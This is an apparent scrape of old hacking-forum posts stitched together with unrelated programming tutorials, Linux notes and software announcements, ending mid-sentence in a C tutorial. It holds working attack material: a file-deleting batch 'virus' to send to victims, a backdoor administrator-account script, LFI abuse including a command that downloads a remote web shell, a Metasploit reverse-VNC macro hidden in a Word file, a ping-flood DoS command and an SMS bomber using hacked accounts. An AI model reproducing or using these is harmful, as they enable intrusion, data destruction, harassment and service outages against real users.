After opening the main.c file the Build menu options are enabled. Selecting the Build | Compile menu command shows that gcc is used for compiling the application and that no errors are found. Nice, but I don't want gcc, I want gcc-cris to be used, or actually I want make to be called with my own parameter.

In the Build menu there is an option available Set includes and arguments, selecting this option shows a dialog that offers three input fields to enter commands for Compile, Build and Execute. Here the gcc command is listed, I guess these commands are indeed given to Linux to execute so entering make compile in the Compile field, make build in the Build field and make build in the Execute field should do the trick. After pressing the OK button and selecting Build | Compile the Compiler shows in blue the execute command (make compile (in directory:/home/jan/FOXBoard/HelloWorld)) and the output of the make program (/usr/local/cris/bin/gcc-cris -mlinux -o Hello_World main.c). After a second a blue message indicates that the Compilation finished successfully. The Build | Build menu command or the Build | Execute command does the same with the addition of executing the secure copy as well.

In the Edit | Preferences menu you can select in the Toolbar tab the option to display a Compile and a Run button. These buttons call the Build | Compile menu (and so make compile) and the Build | Execute menu (and so make build) to make life even easier.

On purpose a mistake is made in main.c to check how errors are handled. The printf is replaced by pri ntf; after pressing compile it shows an error in the Compiler tab and highlights the error in main.c. Very, very nice! It looks like I found my base for developing code; the next step would be to include a debugger as well.

reference : animalrobots

how mailtracking(dot)com actually works.. getting data from an image

on the front end.......
once we register our mail with

mailtracking(dot)com


then we just have to add

.mailtracking.com to the email addresses we have to send to


we can send email which they keep track of and send us updates like..,

when it was opened,
to whom it was sent,
etc... etc..

//************************************************************//

real facts behind this trick
first of all,
when we add

.mailtracking.com


we are just sending our mail to them (their server)..
proof : check the mail headers of the recipients, it's actually from (something).mailtracking(dot)com,
or check the mailed-by option in the received email in Gmail, it will be like this : "mailed-by gmail.com.scdvbkrtxrndmvk.mailtracking.com"

//***********************************************************//


second,
they add a few files which a normal, average user won't recognise..
they add transparent images as shown below..

these 2 are their images (steganography)

http://www.4fvxdj81zkxzh8.mailtracking.com/nocache/4fvxdj81zkxzh9/footer0.gif


size 1x1 px

http://www.4fvxdj81zkxzhh.mailtracking.com/nocache/4fvxdj81zkxzhQ/rspr47.gif


size 4x7 px

and

https://tssls.4fvxdj81zkxzhv.MailTracking.com/nocache/4fvxdj81zkxzhv/rspr47.wav


totally 3 files..
these files are added to the email with html tags like etc...
and sent to your recipients' addresses..

//************************************************************//

when the user opens the image, the image is retrieved from their server; hence your user agent is captured and so is the ip address..

and you get info that your victim has read the email, or has forwarded

//***********************************************************//


and the funny part is,
people still don't realize this..
when the image is being retrieved, the server recognizes the user agent, ip address etc..
you will get their ip, user agent, the computer they use, etc...

hack and enjoy...!!!


reference: cyberterrorist
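The beacon technique the mailtracking post above describes, seen from the receiving side: an added example (not from the original post) in C that scans an HTML mail body for images that are fetched from a host outside the sender's domain or are only a few pixels in size, the two traits of the footer0.gif (1x1) and rspr47.gif (4x7) beacons. The HTML, the abc123 tracking hostname and the sender domain example.com are all constructed for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define MAX_URL 256

/* Constructed sample mail body: one legitimate logo plus two beacons shaped
 * like the ones in the post (a 1x1 gif and a 4x7 gif from a tracking host). */
static const char SAMPLE_MAIL[] =
    "<html><body><p>Hi, the report is attached.</p>"
    "<img src=\"https://mail.example.com/logo.png\" width=\"120\" height=\"40\">"
    "<img src=\"http://www.abc123.mailtracking.com/nocache/abc123/footer0.gif\""
    " width=\"1\" height=\"1\">"
    "<IMG SRC='http://www.abc123.mailtracking.com/nocache/abc123/rspr47.gif'"
    " width=4 height=7>"
    "</body></html>";

/* Copy the value of attribute `name` out of one lowercased tag body
 * (quoted or unquoted value). Returns 1 when the attribute exists. */
static int tag_attr(const char *tag, const char *name, char *out, size_t out_len) {
    size_t n = strlen(name);
    const char *p = tag;
    while ((p = strstr(p, name)) != NULL) {
        const char *q = p + n;
        while (isspace((unsigned char)*q)) q++;
        /* a real attribute: preceded by whitespace and followed by '=' */
        if ((p == tag || isspace((unsigned char)p[-1])) && *q == '=') {
            q++;
            while (isspace((unsigned char)*q)) q++;
            char quote = (*q == '"' || *q == '\'') ? *q++ : '\0';
            size_t i = 0;
            while (*q != '\0' && i + 1 < out_len &&
                   (quote ? *q != quote : !isspace((unsigned char)*q)))
                out[i++] = *q++;
            out[i] = '\0';
            return 1;
        }
        p += n;
    }
    return 0;
}

/* Host part of an absolute URL: the text between "://" and the next '/' or ':'. */
static void url_host(const char *url, char *host, size_t len) {
    const char *p = strstr(url, "://");
    size_t i = 0;
    p = p ? p + 3 : url;
    while (p[i] != '\0' && p[i] != '/' && p[i] != ':' && i + 1 < len) {
        host[i] = p[i];
        i++;
    }
    host[i] = '\0';
}

/* 1 if host is sender_domain itself or a subdomain of it. */
static int same_org(const char *host, const char *domain) {
    size_t h = strlen(host), d = strlen(domain);
    if (h < d || strcmp(host + (h - d), domain) != 0) return 0;
    return h == d || host[h - d - 1] == '.';
}

/* Scan html for <img> tags and report those loaded from outside
 * sender_domain or sized 8x8 pixels or less. Returns the number reported;
 * their src URLs are copied into hits. */
int find_beacons(const char *html, const char *sender_domain,
                 char hits[][MAX_URL], int max_hits) {
    char lower[4096], tag[1024], src[MAX_URL], host[MAX_URL], w[16], h[16];
    size_t n = strlen(html);
    int count = 0;
    if (n >= sizeof lower) n = sizeof lower - 1;
    /* lowercase copy so <IMG SRC=...> matches like <img src=...> */
    for (size_t i = 0; i < n; i++) lower[i] = (char)tolower((unsigned char)html[i]);
    lower[n] = '\0';

    const char *p = lower;
    while (count < max_hits && (p = strstr(p, "<img")) != NULL) {
        const char *end = strchr(p, '>');
        size_t tlen;
        if (end == NULL) break;
        tlen = (size_t)(end - p);
        if (tlen >= sizeof tag) tlen = sizeof tag - 1;
        memcpy(tag, p, tlen);
        tag[tlen] = '\0';
        p = end + 1;
        if (!tag_attr(tag, "src", src, sizeof src)) continue;
        url_host(src, host, sizeof host);
        int external = strstr(src, "://") != NULL && !same_org(host, sender_domain);
        int tiny = tag_attr(tag, "width", w, sizeof w) &&
                   tag_attr(tag, "height", h, sizeof h) &&
                   atoi(w) > 0 && atoi(h) > 0 && atoi(w) <= 8 && atoi(h) <= 8;
        if (external || tiny)
            snprintf(hits[count++], MAX_URL, "%s", src);
    }
    return count;
}

int main(void) {
    char hits[8][MAX_URL];
    int n = find_beacons(SAMPLE_MAIL, "example.com", hits, 8);
    printf("%d suspicious image(s)\n", n);
    for (int i = 0; i < n; i++) printf("  %s\n", hits[i]);
    return 0;
}
```

A mail client that refuses to fetch flagged images until the user asks for them defeats the open notification, since nothing is requested from the tracking host.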

How to make a powerfull virus with only notepad

****************( Works only for Linux and Win XP )****************

To delete all folders/files just put this:

DEL /F /Q *


Into Notepad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read-only and it will not prompt you to do it. You will not think anything has happened until you try to do something.

WARNING!!! DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:
Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C: and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again


reference:cyberterrorist

Hacking a Local Terminal

For the screenshots, I'll be using my Desktop PC and my Samsung Q1.

You will need a USB Flash Drive and a separate computer connected to the same network.

Wait until the target computer is available for use (maybe the person got up to check on something, who knows). As you enter the computer, you can do 2 things:

1) Have a batch ready on your flash drive. The code should be a little something like this:
@echo off
net user SupportUser codemachine /add
net localgroup administrators SupportUser /add


Good, this batch creates a backdoor administrator account on your target terminal. The second option was to do it by hand, but who wants to do that? The chances of having the time being cut short because of your flash drive being recognized are high, that's my opinion.

Go to the Control Panel > Administrative Tools > Services > Telnet
Make sure that the Telnet service is online.

Now scram, get out of there and head to your other computer. At a safe place, open up your Command prompt (or whatever you're using, I use Putty sometimes even though it sucks) and enter:
telnet 192.168.*.*




You should get a message asking if you want to continue..

You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n):



..otherwise you get the login screen. Enter your backdoor information and log in. From there you can surf the directories and change people's passwords. You can install a keylogger to everyone's startup directory, for example.



If you are in a hurry and want to destroy someone's PC forever, have someone sitting with the other PC and after you make your backdoor, instantly delete everything. It's very simple; my brother broke his MacBook so he was using our old Dell laptop. When he was out, I installed a backdoor and began messing around with him while he was online. For example, at the expense of my own Internet, I overloaded the connection and got him to shut down. When he rebooted, his password was changed!

Have fun and stay safe! ;)

reference:hackforums

linux shell commands

When opening a shell, you will be logged in with your active account in your home directory (this is usually /home/user_name).

Note that every command has lots of options available. To see the manual page for a specific command, simply type "man command_name". It is important to understand that under Linux operating systems, commands are case-sensitive. This means that "A" is different from "a".

To move through the file system, use:


- pwd - Prints out on the screen the working directory (eg /etc/ssh)
- cd - changes directory (eg cd .. - goes up one dir; cd etc - enters /etc dir)
- ls - lists the content of the directory
- mkdir - creates a new directory (mkdir dir_name)
- touch - creates a new file (touch file_name)
- rmdir - removes a directory (rmdir dir_name)
- cp - copies a file/directory (cp source_file destination_file)
- mv - moves a file/directory - also used for renaming a file or directory (mv old_location new_location or mv old_name new_name)
- rm - removes files (rm file_name)

To search a file, you can use

- find (used for filenames)
- grep
To view a file, you can use

- more - will display a file page by page
- cat - displays all the file
- head - displays the first lines
- tail - displays the last lines (useful for example when you want to view the last information logged in a file by the system for example)

To edit a file you must use a built-in editor from the command line. Generally, this is vi and it's used with the syntax vi file_name.

To uncompress an archive (usually tar.gz) you must use the tar command with the syntax tar -xvzf archive.tar.gz.

To print a file, use lpr command. Note that you must have some daemons up and running to manage the printer. Usually this is cups (Common UNIX Printing System) that comes with all major distributions.
To remove a file from the printer queue (you can list the queue with the lpq command) you can use lprm job_id.

To mount/unmount (add in your file system as accessible media) use:

- mount /mnt/floppy - to mount floppies
- umount /mnt/floppy - to unmount floppies
- mount /mnt/cdrom - to mount CD-ROMs
- umount /mnt/cdrom - to unmount CD-ROMs

They usually mount automatically, but you could end-up in the situation where you must do it manually.
To mount a partition:
First create a directory in /mnt (mkdir /mnt/my_new_drive) then use the mount command (mount /dev/source /mnt/my_new_drive) where /dev/source is the device (partition) you want to mount in your file system.

If you want to connect to a remote host, use the ssh command. The syntax is ssh user@host.

System management:

- ps - shows the current processes running (useful: ps -A shows all processes)
In the list obtained by using the ps command you will see a PID number (process identifier).

This number is required to stop a service or application. Use kill pid to stop a task.

- top - works somewhat like the Task Manager in Windows. It shows the system resources, the processes running, average load, etc. A useful option is top -d, which sets the refresh period. You can put any value from .1 (10 ms) to 100 (100 seconds) or even greater.

- uptime will display the system's uptime and the load average for that moment, 5 minutes and 15 minutes in the past.

Usually, the load average is calculated as the percentage of system resources (processor, RAM, hard disk I/O, network load) used at that moment. 0.37 means that 37% was used. A greater value like 2.35 means that the system had to queue some work because it would need to be 235% faster to compute everything without problems. Anyhow, this can differ from distribution to distribution.

- free - will display information on system's memory

- ifconfig - view detailed information about your network interfaces; generally your Ethernet network interface will be named eth0. You can also set up network settings like the IP address by using this command (see man ifconfig). If something goes wrong, you can also stop/start the interface with ifconfig eth0 down / ifconfig eth0 up

- passwd - enables you to change your password (passwd own_user or others if you are logged in as root)

- useradd - enables to add a new user (see man useradd)

Wherever you are, you can use the TAB key to autocomplete a filename or command. This will be useful while getting used to the available commands. You can also hit the up and down arrows to scroll through the history of the commands you entered.
You can also use multiple commands on one line. Let's say you want to create 3 directories at once. The syntax is mkdir dir1 ; mkdir dir2 ; mkdir dir3.
Another useful thing is the pipe. You can feed one command's output through another. E.g.: man mkdir | tail will display the last lines of the manual page of the mkdir command.

If at any time you are asked for the root account (the super-administrator of the system) you can log in temporarily with it by using the su command. You should also include the -l parameter (su -l) to switch the home folder and available commands too. Note that you will be prompted for a password.

To exit the shell type exit or logout.

reference:cyberterrorists.net

How to make a basic web browser.

Step one.

Get visual basic 2008 here.

Create a new form, select web app.

Step two.

Create 5 buttons, a web browser, and a text box. Tidy it up, make it cool.


Step three


The coding! Ok first, the five buttons are: Go, refresh, back, forward, home and stop.

So for each buttons or what ever I give you the code, double click the object, and copy&paste the code I give. Let's do this!


Go button
WebBrowser1.Navigate(TextBox1.Text)


Home button
WebBrowser1.GoHome()


Refresh button
WebBrowser1.Refresh()


Back button
WebBrowser1.GoBack()


Forward button
WebBrowser1.GoForward()


Stop button
WebBrowser1.Stop()


Then press F5 and you're done! I hope this helped you! I might do another TuT on advanced browsers. Have fun!

reference:hackforums.

NASM - The Netwide Assembler description

NASM - The Netwide Assembler is 80x86 assembler designed for portability and modularity.

NASM is an 80x86 assembler designed for portability and modularity. The project supports a range of object file formats including Linux a.out and ELF, COFF, Microsoft 16-bit OBJ and Win32. It will also output plain binary files.

Its syntax is designed to be simple and easy to understand, similar to Intel's but less complex. It supports Pentium, P6, MMX, 3DNow! and SSE opcodes, and has macro capability. It includes a disassembler as well.

The Netwide Assembler grew out of an idea on comp.lang.asm.x86 (or possibly alt.lang.asm - I forget which), which was essentially that there didn't seem to be a good free x86-series assembler around, and that maybe someone ought to write one.

- a86 is good, but not free, and in particular you don't get any 32-bit capability until you pay. It's DOS only, too.
- gas is free, and ports over DOS and Unix, but it's not very good, since it's designed to be a back end to gcc, which always feeds it correct code. So its error checking is minimal. Also, its syntax is horrible, from the point of view of anyone trying to actually write anything in it. Plus you can't write 16-bit code in it (properly).
- as86 is Minix- and Linux-specific, and (my version at least) doesn't seem to have much (or any) documentation.
- MASM isn't very good, and it's (was) expensive, and it runs only under DOS.
- TASM is better, but still strives for MASM compatibility, which means millions of directives and tons of red tape. And its syntax is essentially MASM's, with the contradictions and quirks that entails (although it sorts out some of those by means of Ideal mode). It's expensive too. And it's DOS-only.

So here, for your coding pleasure, is NASM. At present it's still in prototype stage - we don't promise that it can outperform any of these assemblers. But please, please send us bug reports, fixes, helpful information, and anything else you can get your hands on (and thanks to the many people who've done this already! You all know who you are), and we'll improve it out of all recognition. Again.

Installing NASM under Unix

Once you've obtained the Unix source archive for NASM, nasm-X.XX.tar.gz (where X.XX denotes the version number of NASM contained in the archive), unpack it into a directory such as /usr/local/src. The archive, when unpacked, will create its own subdirectory nasm-X.XX.

NASM is an auto-configuring package: once you've unpacked it, cd to the directory it's been unpacked into and type ./configure. This shell script will find the best C compiler to use for building NASM and set up Makefiles accordingly.

Once NASM has auto-configured, you can type make to build the nasm and ndisasm binaries, and then make install to install them in /usr/local/bin and install the man pages nasm.1 and ndisasm.1 in /usr/local/man/man1. Alternatively, you can give options such as --prefix to the configure script (see the file INSTALL for more details), or install the programs yourself.

NASM also comes with a set of utilities for handling the RDOFF custom object-file format, which are in the rdoff subdirectory of the NASM archive. You can build these with make rdf and install them with make rdf_install, if you want them.

If NASM fails to auto-configure, you may still be able to make it compile by using the fall-back Unix makefile Makefile.unx. Copy or rename that file to Makefile and try typing make. There is also a Makefile.unx file in the rdoff subdirectory.

What's New in This Release:

· NASM is now under the 2-clause BSD license. See section 1.1.2.
· Fix the section type for the .strtab section in the elf64 output format.
· Fix the handling of COMMON directives in the obj output format.
· New ith and srec output formats; these are variants of the bin output format which output Intel hex and Motorola S-records, respectively. See section 7.2 and section 7.3.
· rdf2ihx replaced with an enhanced rdf2bin, which can output binary, COM, Intel hex or Motorola S-records.
· The Windows installer now puts the NASM directory first in the PATH of the "NASM Shell".
· Revert the early expansion behavior of %+ to pre-2.06 behavior: %+ is only expanded late.
· Yet another Mach-O alignment fix.
· Don't delete the list file on errors. Also, include error and warning information in the list file.
· Support for 64-bit Mach-O output, see section 7.8.
· Fix assert failure on certain operations that involve strings with high-bit bytes.

reference:http://linux.softpedia.com/get/Programming/Compilers/NASM-The-Netwide-Assembler-643.shtml

What you can use LFI for???

Allright, so i got this question often... Some guy got a LFI vuln some place but, what the fuck do i use it for?

Well, there is a few things you can do with it..

1. If /etc/passwd contains the user passwords on the system you can use ssh (assuming they have ssh and use the system users as logins), or if someone is a fucking idiot and makes /etc/shadow readable for anyone when /etc/passwd is just x'ed out... If on a Windows machine maybe you can include the SAM file? dunno..

2. You can try to include the error or access log and then telnet to the server and make it write php code to the error or access log; that way you can get a shell! Also if the error or access log logs the user agent or other shit you can just browse the page with php in the user agent, then include it

3. If it's a shared host or a server with more pages on it you can try to find upload forms etc etc on the other pages hosted on the same server, then make an image containing php code inside it, then include it from the page you want to hack, that way getting shell access! You can ofc do this on the same domain too, if it has some kind of upload form, and it doesn't need to be images; it can be documents or pdfs, anything!

4. Finding config or other interesting files... Many idiots store their ftp and/or ssh info in .txt or .doc files outside the www dir, but if you have LFI you can include those anyway! Takes a bit of time trying out file names and shit through xD Also .config files or config.php files can contain things like root mysqld info and that can lead to more interesting stuff! Also, maybe a page has a basic login system reading from a config.php so you can get admin access on the page..


5. if it's a site with a forum you can upload an image with arbitrary code then include and execute it..

6. You can even make it vulnerable to LFI
Code:



then
Code:
http://anything.org/index.php?action=../proc/self/environ?cmd=curlhttp://zero-thunder.com/mu.txt -o zero.php


and the shell will be up like this

Code:
http://anything.org/zero.php




7. or u can do something like this ..
if proc/self/environ is accessible you can
Code:



zero.php is the shell and the server will download
Code:

http://zero-thunder.com/mu.txt

and it will save it as zero.php and u will get something like this

Code:
http://anything.org/zero.php


reference:cyberterrorist

Metasploit: Reverse VNC hidden in a Word file

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word which, once a user opens the Word file containing the macro, gives us a reverse VNC session to the target system; even antivirus can't detect it,

VNC does not need to be installed on the victim PC
u can also do this over the WAN; the only thing is u should port-forward port 4444 on ur modem or router

Lets begin

1) Create a macro to integrate with Word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on Windows opens the file, he/she will be asked whether to run the macro or not; if accepted, the connection will be initiated and the VNC client will open on the BackTrack host.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

reference:darkc0de

SMS Bomber by AlphaDog




-Spams Cell Phones With Text Messages (SMS Bombing)

-Use

1.Select an SMTP server & port. The given SMTP server and port are for Gmail accounts.
SMTP is the incoming and outgoing connection, w/e; this uses outgoing. SMTP is used for every mailing system.

2.Type in the account information , email info / email and pass , if you don't want to use your account just select one of the ready hacked ones ..


3.Fill :
-Victims cell number
-How many to spam
-Provider

4.Type in message

5.Start Tongue

*Note that this program may harm your PC if you have CPU like Pentium 3 or older ...

so that's about it ... as you see its 1.0 so there will be updates .. i will try to imput providers providers from Macedonia and 2-3 other countries.

DOWNLOAD:
Code:

http://rapidshare.com/files/277283168/AlphaDog_SMS_Bomber.rar.html


Enjoy......................

reference:evilzone

How To Send DoS Attack With CMD

Q: what is dos ??
A: Denial of Service (DoS) attacks are aggressive attacks on an individual computer or website with intent to deny services to intended users.
DoS attacks can target end-user systems, servers, routers and network links (websites)

Requirements:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??
No problem.. here is the solution..
open ur CMD (command prompt).. and type

ping www.yoursitename.com


or

nslookup yoursite .com


It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..


------> ping SITE-IP -l 65500 -n 10000000 -w 0.00001 <------

Here -n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

reference:cyberterorist forum..

URL Dumper V.2 BIN and Source Code!

URL Dumper is an Online scanner coded by me with VB.NET in the last years ago..
Used to get XSS and SQL injection vulns.. supports multi search engine, trash system, etc..

Features:
-Get all page links by advanced technique with regular expression;
-XSS Scanner (auto check all page links);
-SQLInjection Scanner (auto check all page links);
-Multi-Thread engine;
-Get many links by search (google/Yahoo/Live Search/Altavista/Terravista)
-Search in the page source by regular expression;
-View Source (Code/Browser);
-Trash system
-Database in SQLite to organize the URL’s
-Enabled Proxy server
-Etc..

Coded by me with vb.net 2008

Screen Shot:



Download BIN:
Download SRC:

reference:http://flash.i.ph/blogs/flash/2009/01/20/url-dumper-v2/

Slackware 13.0 Officially Supported on x86_64 Processors

After a long wait, Slackware fans are finally able to rejoice, as Patrick J. Volkerding announced late yesterday that Slackware 13.0 was available at last. The changes definitely warrant the major version bump, since this release has a number of unique features that its predecessor wasn't capable of, like running natively on 64-bit processors, improved X Window System that doesn't require an xorg.conf file and a massively overhauled set of build scripts.

Volkerding's enthusiasm about this release is visible in his announcement: "Yes it's that time again! After many months of development and careful testing, we are proud to announce the release of Slackware version 13.0! We are sure you'll agree that the improvements made in this release more than warrant the major version bump up from the 12.x series. We've done our best to bring the latest technology to Slackware while still maintaining the stability and security that you have come to expect."

The low-level functions are provided by the Linux kernel, version 2.6.29.6, which makes the system faster and includes support for the X Direct Rendering Interface that enables the display of hardware accelerated 3D graphics. Also, the kernel is patched to support speech synthesizers, a very useful function for the visually impaired users. A core change since Slackware 12.2 is that some devices, like network hardware, are now initialized at install time, and the new udev scripts are tweaked to give normal users a seamless experience when managing their devices.

On top of that kernel you can have by default one of the two supported desktop environments: KDE 4.2.4 or Xfce 4.6.1. GNOME fans won't feel totally stranded, as Pidgin 2.5.9, Gimp-2.6.6 and xChat 2.8.6 are included. The other applications are what you would expect from a modern operating system, with Firefox 3.5.2 on board, as well as Thunderbird 2.0.0.23. Programmers will surely enjoy the new development tools, like Perl 5.10.0, Python 2.6.2, Ruby 1.8.7-p174, Subversion 1.6.4, Git 1.6.4, Mercurial 1.2.1.

Download Slackware 13.0 right now from Softpedia.

Wardriving tools

The Cain & Abel:
http://www.softmania.pl/program-1807-cain_abel.html#m


The AirSnort:
http://www.softmania.pl/program-1806-airsnort.html#m


The Wireshark:
http://www.softmania.pl/program-1811-wireshark.html#m

The AirCrack 1.0 (Windows & Linux):
http://download.aircrack-ng.org/


The AirPcap:
http://www.softmania.pl/program-1813-airpcap_driver.html#m


The WinPcap:
http://www.softmania.pl/program-1810-winpcap.html#m


The Net Stumbler:
http://www.softmania.pl/program-1809-netstumbler.html#m

The AirTraf:
http://www.elixar.com/corporate/history/airtraf-1.0/airtraf_download.php


The Kismet:
http://www.idg.pl/ftp/linux_740/Kismet.2005.06.R1.html


The AirJack:
http://sourceforge.net/projects/airjack/


The AiroMap:
http://handheld.softpedia.com/get/GPS/AiroMap-60181.shtml


The WiFi Hopper:
http://wifihopper.com/


The WepCrack:
http://sourceforge.net/projects/wepcrack/


The WirelessMon:
http://www.passmark.com/products/wirelessmonitor.htm



download the tools for makin better

C tutorial [Chapter 1]

[Introduction]
The purpose of this tutorial is to learn how to use C with some of its best features like pointers, process and thread creation, semaphores and signal handling. Of course to learn how to do all this we need to start from the beginning.
This is not a basic programming tutorial. If you don't know how the art of programming works this is not a tutorial for you. C is a very complex language if you are a beginner. Try Python or even Java if you want to start with something easy then you will be prepared to learn this awesome language.
I love Linux. Linux loves C. I don't know if any of the techniques exposed here work in a Windows machine... I really don't care if they work... Linux is a very efficient OS. I won't explain why, but in the references below, you will find the book that explains why any Unix based system is better than any flavor of Windows.

[In the beginning there was darkness]
Let's learn some syntax first:

Variable types


int: Integer
char: Character
float: Float
char* or char[]: Strings



Among others...

Assignment


int intName = 10;
char charName = 48; // "0"
char* str1Name = "Hello World";



IF-ELSE IF-ELSE statements


if(condition1){
Instructions
}else if(condition2){
Instructions
...
}else if(conditionN){
Instructions
}else{
Instructions
}


Switch statements
Faster than If statements


switch(condition){
case 1:
Instructions
break;
...
case N:
Instructions
break;
default:
Instructions
}



Loops
While loop


while(condition){
Instructions
}


For Loop


int i;
for(i=0; condition; i++){
Instructions
}


Do-While Loop


do{
Instructions
}while(condition);


Useful functions
Search in the man pages of your Linux distribution how to use them. In Debian you have to install them from the repositories.

apt-get install manpages-dev


The functions you should man for now are:
printf
scanf
strlen
strcpy
strcat
malloc
free

Pointer
The beautiful pointers... Thanks to them we have Object-Oriented Programming.
Let's say this is our memory (All numbers in Hex with a Little-Endian 32 bits hardware):

Endianness -> http://en.wikipedia.org/wiki/Endianness



-----------------------------
Address | Memory |
-----------------------------
0x00 | 00 | 00 | 00 | 0A |
-----------------------------
0x04 | 00 | 00 | 00 | 00 |
-----------------------------
0x08 | 4C | 4C | 45 | 48 |
-----------------------------
0x0C | 00 | 00 | 00 | 4F |
-----------------------------

Also lets say our program is:

int a = 10; //Address 0x00
int* b = &a; //Address 0x04
char* c = "HELLO"; //Address 0x08

b is a pointer. If I print b I will get 0x00000000,
which is the address of a. If I print *b I will print
the value of the thing b is pointing to, in this case a.
So printing *b will result in 0x0000000A, or 10.
If I print &a I will get the address of a, which is 0x00000000.

Now if I print c[2] I will get 4C which is L in the ascii table.
If I print all the string, it will print till it gets to the null byte
In this case the null byte is in the sixth byte of the string.
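The table above is imaginary; as an added example (not from the tutorial), this C program builds the same rows from real variables so the byte order can be checked on your own machine. It keeps "HELLO" in an 8-byte array c rather than behind a char*, so the two string rows can be printed directly; the 0x04 row (the pointer b) is printed with %p because a pointer is 8 bytes on a 64-bit build.

```c
#include <stdio.h>
#include <string.h>

/* 1 on a little-endian CPU: the low byte of an int sits at the lowest address. */
int is_little_endian(void) {
    int probe = 1;
    return *(const unsigned char *)&probe == 1;
}

/* The byte stored at address p + index, whatever type p points to. */
unsigned char byte_at(const void *p, size_t index) {
    return ((const unsigned char *)p)[index];
}

/* Format one 4-byte row the way the table does: highest address on the left,
 * lowest on the right, so a little-endian int 10 reads "00 | 00 | 00 | 0A".
 * out must have room for at least 32 characters. */
void format_row(unsigned offset, const void *p, char *out) {
    const unsigned char *b = p;
    snprintf(out, 32, "0x%02X | %02X | %02X | %02X | %02X |", offset,
             (unsigned)b[3], (unsigned)b[2], (unsigned)b[1], (unsigned)b[0]);
}

int main(void) {
    int a = 10;           /* the table's row at 0x00 */
    int *b = &a;          /* the table's row at 0x04: holds the address of a */
    char c[8] = "HELLO";  /* rows 0x08 and 0x0C; unused bytes are zero-filled */
    char row[32];

    printf("little-endian: %s\n", is_little_endian() ? "yes" : "no");
    format_row(0x00, &a, row);    puts(row);
    format_row(0x08, c, row);     puts(row);
    format_row(0x0C, c + 4, row); puts(row);
    /* b holds an address, *b the value stored there, &a that same address */
    printf("b = %p, *b = %d, &a = %p\n", (void *)b, *b, (void *)&a);
    /* c[2] is the byte at c + 2: 0x4C, the letter L; the null byte follows the 5 letters */
    printf("c[2] = 0x%02X ('%c'), strlen(c) = %zu, null byte at index %zu\n",
           (unsigned)byte_at(c, 2), c[2], strlen(c), strlen(c));
    return 0;
}
```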




Now you know how to get the information of a pointer :)
To reserve memory use the function malloc like this:


char* str;
int* i;
/*
* To reserve 10 bytes for str. The (char *)
* is for the program to know what kind of
* pointer will be.
*/
str = (char *)malloc(10);
/*
* To reserve enough space for an int I use the
* sizeof operator.
*/
i = (int *)malloc(sizeof(int));


Precompiler Instructions
These are special instructions. All the work is done by the compiler, but they make our life easier.
Include precompiler instruction
It's to import the libraries you want to use in your program.
For system libraries:


#include <stdio.h> //This will include the stdio.h file


For user defined libraries:


#include "list.h"//This will include the list.h file.


Define precompiler instruction
To define a constant:


#define TRUE 1//This will define the word TRUE as 1


The .h files are the header files. There you'll have the signature of every function in the .c file with the same name.

sum.h

#include <stdio.h>

void printSum(int, int);


sum.c


#include "sum.h"

int sum( int a, int b ){
return ( a + b );
}

void printSum(int a, int b ){
printf("The result is %d", sum( a , b ));//Prints result on screen
}


As you can see, sum.h only declares the printSum function. This is because printSum is a public function while sum is just a private function: whoever uses this (admittedly useless) library will not be able to call sum, but will be able to call printSum. So to define a "class" you should use a header file. But how do you define a new data type? With structures :)

Structures
Let's say we want to define the data type Person (Name, Age, Gender)

person.h


#include <stdio.h>
#include <stdlib.h>//malloc, free
#include <string.h>//strlen, strcpy

struct PERSON{
    char* pName;
    int pAge;
    int pGender;//0 for man, 1 for woman
};

typedef struct PERSON Person;

Person* newPerson(char*, int, int);

person.c



#include "person.h"

//Constructor of Person. Returns NULL on error
Person* newPerson(char* name, int age, int gender){
    /*
     * To reserve some memory use malloc with the size you need.
     * In this case I need enough space to hold a Person,
     * so I use sizeof(Person). malloc returns NULL when it fails,
     * so check the result before using it.
     */
    Person* nPerson = (Person *) malloc(sizeof(Person));
    if(nPerson == NULL || name == NULL){
        free(nPerson);//free(NULL) is allowed and does nothing
        return NULL;
    }
    //To access the members of this "class" we use the "->" operator.
    if(gender != 0 && gender != 1){
        free(nPerson);//To free the space used by nPerson
        return NULL;
    }
    //To access pGender, member of Person
    nPerson->pGender = gender;
    if(age<0){
        free(nPerson);//To free the space used by nPerson
        return NULL;
    }
    //To access pAge, member of Person
    nPerson->pAge = age;
    /*
     * With malloc I reserve as many bytes as the string name needs, which is
     * strlen(name) + 1: strlen does not count the terminating null byte, and
     * without that extra byte strcpy would write one byte past the end of the
     * buffer. Then I assign the new address to pName, member of Person. If malloc
